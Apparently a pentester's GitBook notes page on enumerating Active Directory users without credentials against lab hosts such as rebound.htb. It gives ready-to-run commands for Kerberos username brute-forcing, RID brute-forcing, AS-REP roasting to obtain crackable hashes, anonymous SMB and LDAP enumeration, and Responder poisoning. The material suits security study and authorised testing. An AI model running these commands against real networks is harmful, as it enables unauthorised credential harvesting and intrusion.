Pentesting Notes
  • Home
  • 🌐Web pentesting
    • Content Discovery
    • Subdomain Enumeration
    • Authentication bypass
    • IDOR (Insecure Direct Object Reference)
    • Git repository
    • XSS
    • SSRF
    • CSRF
    • Injection
      • SQL Injection
      • Cypher injection
      • Command injection
      • Server Side Template Injection
      • NoSQL injection
      • XXE
    • FI (File Inclusion)
    • File upload
    • OAuth
    • JWT
    • CORS
    • Prototype pollution
    • Request Smuggling
  • Windows Pentesting
    • Enumerating users (No credentials)
    • Privilege Escalation
    • Post-Exploitation
    • Cross-domain enumeration
    • LDAP port (389, 636, 3268, 3269)
    • SMB port (139,445)
    • MSSQL port (1433)
    • Certificate Authority (CA)
    • Delegation attacks
    • Attacking Kerberos
    • Relay attacks
    • Bypassing Security
    • File Transfer
    • GPO (Group Policy Object)
    • Tools
      • Mimikatz
      • NetExec
      • Crackmapexec (CME)
      • Powerview
      • Bloodhound
      • Impacket
      • BloodyAD
      • Sliver C2
  • 🐧Linux Pentesting
    • Linux Privilege Esclation
    • Escape docker
    • Ansible
  • 🕊️Cross platform pivoting
    • Pivoting
  • ☁️Cloud
    • Kubernetes
    • Azure
      • Architecture
        • RBAC & ABAC roles
        • Entra ID roles
        • Entra ID - Authentication with OAuth and API's
        • Consent and Permissions
      • Service Discovery, Recon, Enumeration and Initial Access Attacks
        • Unauthenticated Recon
        • Password Spraying
        • Azure App Service
        • Azure Blob Storage
        • Phishing with Evilginx
        • Conditional Access
      • Authenticated Enumeration
        • ROADTools
        • BloodHound & AzureHound
        • Storage Accounts (database)
      • Privilege Escalation
        • Illicit Consent Grant
        • Macro enabled Word-files (Revshell)
        • Add secrets to app
        • Automation Accounts & Function Apps
        • Virtual Machines
        • Key Vault
        • ARM Deployment History
        • Enterprise Application / Service Principal
      • Lateral Movement
        • Entra ID Devices & Primary Refresh Tokens
        • Dynamic Groups
        • Application Proxy
        • Hybrid Identity
  • 🔁Reversing
    • Windows executables and DLL's
    • Linux binaries
    • Java applications
    • Android APK
  • 🛜Wireless networks
    • WPA/WPA2
    • WPS
    • WEP
    • Capative portal bypass
    • Setting up a Rogue Access Point
    • WPA Enterpise (WPA-MGT)
  • ⭐Tips and tricks
    • Tips and tricks
Powered by GitBook
On this page
  • Kerbrute usernames
  • Getting users with impacket-lookupsid
  • Crackmapexec rid-brute
  • AS-REP Roasting
  • Guest access smb share
  • Enumerate LDAP
  • Relay/poisoning
  • AD-enumerator.py
  1. Windows Pentesting

Enumerating users (No credentials)

Seeking for a foothold heh?

PreviousRequest SmugglingNextPrivilege Escalation

Last updated 5 months ago

Kerbrute usernames

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

./kerbrute_linux_amd64 userenum -d rebound.htb --dc 10.10.11.231 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Getting users with impacket-lookupsid

impacket-lookupsid rebound.htb/anon@10.10.11.231

Crackmapexec rid-brute

crackmapexec smb rebound.htb -u anonymous -p "" --rid-brute 10000

AS-REP Roasting

AS-REP roasting is an attack against Kerberos for user that don't require preauthentication During preauthentication, a user will enter their password which will be used to encrypt a timestamp and then the domain controller will attempt to decrypt it and validate that the right password was used and that it is not replaying a previous request. From there, the TGT will be issued for the user to use for future authentication. If preauthentication is disabled, an attacker could request authentication data for any user and the DC would return an encrypted TGT that can be brute-forced offline.

impacket-GetNPUsers zsm.local/marcus -no-pass -request -format hashcat -outputfile outfile

Guest access smb share

First list all shares:

smbclient -L //10.10.110.55
crackmapexec smb 192.168.210.10 -u 'a' -p '' --shares
enum4linux -a -u "" -p "" 10.10.110.55 && enum4linux -a -u "guest" -p "" 10.10.110.55

Connect to share:

smbclient //10.10.110.55/sharename

Enumerate LDAP

ldapsearch -x -h 10.10.110.55 -s <base>
nmap -n -sV --script "ldap* and not brute" -p 389 10.10.110.55

Relay/poisoning

sudo responder -I tun0 -v

AD-enumerator.py

Windows Active Directory enumeration tool for Linux, written in Python. Can be used to quickly enumerate popular services on a Windows Domain Controller.

ad-enumerator.py -t 10.10.10.10 -A

Release v1.0.3 · ropnop/kerbruteGitHub
Logo
GitHub - 1ncendium/AD-Enumerator: Windows Active Directory enumeration tool for LinuxGitHub
Logo